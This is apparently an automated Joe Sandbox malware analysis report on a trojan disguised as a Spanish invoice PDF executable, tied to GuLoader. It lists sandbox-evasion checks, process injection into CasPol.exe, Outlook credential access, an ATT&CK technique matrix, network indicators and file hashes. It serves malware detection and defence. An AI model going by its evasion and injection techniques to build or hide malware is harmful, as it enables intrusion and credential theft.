          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B7DFA pushfd ; retf 0_2_048B7E05
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B4B26 push eax; retf 0_2_048B4B3D
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B0D3A pushad ; ret 0_2_048B0D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC7C71 push es; iretd 11_2_00FC7C74
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC2072 push FFFFFF83h; retf 11_2_00FC209F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC5A6C push cs; ret 11_2_00FC5A71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC4C15 push edi; iretd 11_2_00FC4C16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC4C0D push edi; iretd 11_2_00FC4C0E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC71FA push esi; ret 11_2_00FC71FD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC7DFA pushfd ; retf 11_2_00FC7E05
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC4BC1 push edi; iretd 11_2_00FC4BC2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC4BAE push edi; iretd 11_2_00FC4BBA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC0D3A pushad ; ret 11_2_00FC0D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC4B26 push eax; retf 11_2_00FC4B3D
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: System.Reflection.Primitives.dll.0.drStatic PE information: 0xE40AD0DE [Wed Mar 28 09:54:38 2091 UTC]
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dllJump to dropped file
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\AdvSplash.dllJump to dropped file
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dllJump to dropped file
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          Source: Possible double extension: pdf.exeStatic PE information: rFACTURA_FAC_2023_1-1000733.PDF.exe
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEA
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dllJump to dropped file
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dllJump to dropped file
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4900
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-4895
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exea
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1414281617.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1463555266.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 0000000B.00000002.1862719819.00000000053F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: FC0000Jump to behavior
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
          Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp, Amcache.hve.15.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          Windows Service
          1
          Access Token Manipulation
          1
          Masquerading
          OS Credential Dumping211
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium11
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          Windows Service
          1
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth1
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)111
          Process Injection
          1
          Disable or Modify Tools
          Security Account Manager1
          System Network Configuration Discovery
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)1
          DLL Side-Loading
          1
          Access Token Manipulation
          NTDS2
          File and Directory Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
          Process Injection
          LSA Secrets16
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common12
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Timestomp
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Source | Detection | Scanner | Label | Link
          rFACTURA_FAC_2023_1-1000733.PDF.exe | 20% | Virustotal | | Browse
          rFACTURA_FAC_2023_1-1000733.PDF.exe | 5% | ReversingLabs | Win32.Trojan.Generic |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\AdvSplash.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll | 0% | ReversingLabs | |

          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          checkip.dyndns.com | 0% | Virustotal | | Browse
          checkip.dyndns.org | 0% | Virustotal | | Browse

          Source | Detection | Scanner | Label | Link
          http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe |
          http://subca.ocsp-certum.com02 | 0% | Avira URL Cloud | safe |
          http://subca.ocsp-certum.com01 | 0% | Avira URL Cloud | safe |
          http://subca.ocsp-certum.com05 | 0% | Avira URL Cloud | safe |
          http://checkip.dyndns.org | 0% | Avira URL Cloud | safe |
          http://checkip.dyndns.org/ | 0% | Virustotal | | Browse
          http://checkip.dyndns.org | 0% | Virustotal | | Browse
          https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external | 0% | Avira URL Cloud | safe |
          http://checkip.dyndns.com | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.181.238 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.185.193 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | true | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
doc-0s-a8-docs.googleusercontent.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | | 16989 | UTMEMUS | true
142.250.181.238 | drive.google.com | United States | | 15169 | GOOGLEUS | false
142.250.185.193 | googlehosted.l.googleusercontent.com | United States | | 15169 | GOOGLEUS | false

Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830399
Start date and time: 2023-03-20 11:00:46 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: rFACTURA_FAC_2023_1-1000733.PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/21@3/3
EGA Information:
• Successful, ratio: 50%
HDC Information:
• Successful, ratio: 35.6% (good quality ratio 34.7%)
• Quality average: 88%
• Quality standard deviation: 22.2%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 77
• Number of non-executed functions: 34
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20
• Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, umwatson.events.data.microsoft.com, wdcp.microsoft.com
• Execution Graph export aborted for target CasPol.exe, PID 6576 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

No simulations
                                                                    • 142.250.181.238
                                                                    • 142.250.185.193
                                                                    setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                    • 142.250.181.238
                                                                    • 142.250.185.193
                                                                    setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                    • 142.250.181.238
                                                                    • 142.250.185.193
                                                                    setup.exeGet hashmaliciousDjvuBrowse
                                                                    • 142.250.181.238
                                                                    • 142.250.185.193
                                                                    setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                    • 142.250.181.238
                                                                    • 142.250.185.193
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll
rJUSTIFICANTEDEPAGO.exe | Get hash | malicious | GuLoader | Browse
rAEAT-AvisodeNotificaci__n.exe | Get hash | malicious | GuLoader | Browse
AEAT-Notificaci#U00f3n..rar | Get hash | malicious | GuLoader | Browse
PO-TO003256.exe | Get hash | malicious | GuLoader | Browse
PO-TO003256.exe | Get hash | malicious | GuLoader | Browse
SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe | Get hash | malicious | AgentTesla, GuLoader | Browse
SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe | Get hash | malicious | AgentTesla, GuLoader | Browse
SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe | Get hash | malicious | GuLoader | Browse
SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe | Get hash | malicious | GuLoader | Browse
DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe | Get hash | malicious | AgentTesla, GuLoader | Browse
DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe | Get hash | malicious | GuLoader | Browse
PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe | Get hash | malicious | AgentTesla, GuLoader | Browse
DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe | Get hash | malicious | GuLoader | Browse
PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe | Get hash | malicious | Unknown | Browse
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):65536
                                                                                                Entropy (8bit):1.2413907368074433
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:9fE059v6x3mBUWSaX+AMWVM+Du76zfAIO8h:S0j6wBUWSaOaq+Du76zfAIO8h
                                                                                                MD5:35DD3D5B04B74FA528100F3D0EFD2762
                                                                                                SHA1:7152E07DBB8C0F5FBF780254D2E2E8C46B7B9F1F
                                                                                                SHA-256:90E8785A4995B03B26F73D1A63BD0AADF591CAD0E8CBC0A35DA78088B3364F7B
                                                                                                SHA-512:FC42405BD29FE2913BDB0A7D8C8F32CDBC6794F8B6E310A704A53AD96E95C4449F327EFF9146328001B51D4FB5DD97ED1CF0580545CAE3C43D8D3140007AC9BD
                                                                                                Malicious:false
                                                                                                Reputation:low
Preview:Version=1..EventType=CLR20r3..EventTime=133237839784730285..ReportType=2..Consent=1..UploadTime=133237839795821676..ReportStatus=524384..ReportIdentifier=d3bd527c-2f90-4458-9cd4-e1517201fb0e..IntegratorReportIdentifier=090915c9-1e38-488f-93e3-2974fe7faa0c..Wow64Host=34404..Wow64Guest=332..NsAppName=caspol.exe..OriginalFilename=caspol.exe..AppSessionGuid=000019b0-0001-0015-8bd3-18f61b5bd901..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00008c68ca3f013c490161c0156ef359af03594ae5e2!C
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Mar 20 11:06:18 2023, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):298062
                                                                                                Entropy (8bit):3.5731501507227876
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:5YgOQBtas+vqyCftZYyC4uEq5mS2VLTgKQh85:5JHaseqyCDFC4Of2BTgh
                                                                                                MD5:EBEB9263C8F7B88F1C962D0F6D174ED7
                                                                                                SHA1:49718D4D2B825BFC51D546C3360190787F9CC0DF
                                                                                                SHA-256:5A6B0099475067373495611C80EE30CD8FFF8CBCC41570CA6E3203FE371399D4
                                                                                                SHA-512:F61A6D1019C9BE483002858790ABC909C8AC52821310B07ACA70F4790E8905F0DD8AD7AE08B13413D1353F3517D2E76532BBFA455F047C209CD2EE6759EF6EFC
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8478
                                                                                                Entropy (8bit):3.7135390864151505
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:R9l7lZNipu6ISD1/6Y786zgmfZkCL9pr189b2Ssf0EkSm:R9lnNig6ISp6YA6zgmfWN2RfXQ
                                                                                                MD5:FF404A19C5664B74EF66C62FD6BC2652
                                                                                                SHA1:D287A995597C29843696562F0B0778734BBBB778
                                                                                                SHA-256:90016E84D9557D7D3D5C53E9CFCAF383A41AE3D38640E8504B31FFA71B6AA4CD
                                                                                                SHA-512:D7C9874B81D30F8C75CE136FF25F53443276F831FBB29DFA65914EDD8550B2D22E22D98182FE976F9CF2FB99EEBF4210BCA17B5F9284C9B3CE2D53989D8D0ABE
                                                                                                Malicious:false
                                                                                                Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19042</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.1165.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>1165</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>6576</Pi
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4928
                                                                                                Entropy (8bit):4.552958834584104
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwwtl8zs+e702I7VFJ5WS2CfjkLs3rm8M4JdpPFOo/+q8vrpGvktd:uILfz7GySPfnJF/KIvktd
                                                                                                MD5:78A0C11C168CDC2D5F74C2BEEA25637A
                                                                                                SHA1:850126AB6E4157230C5FFC3A93CC94C3EDA0975A
                                                                                                SHA-256:87920F454E599C8EE65E0F3F86BA5AB57473822CB516A507753D55CEA79412B9
                                                                                                SHA-512:FD57DD4E26B1E020CD67AD7834870539DA41B2723377F846504D15ED2D326F14564513D23A596E0BFDD7848F6FDB61AAECF7F0345BF4AC56F4BE1A21556F9EA8
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222060348" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
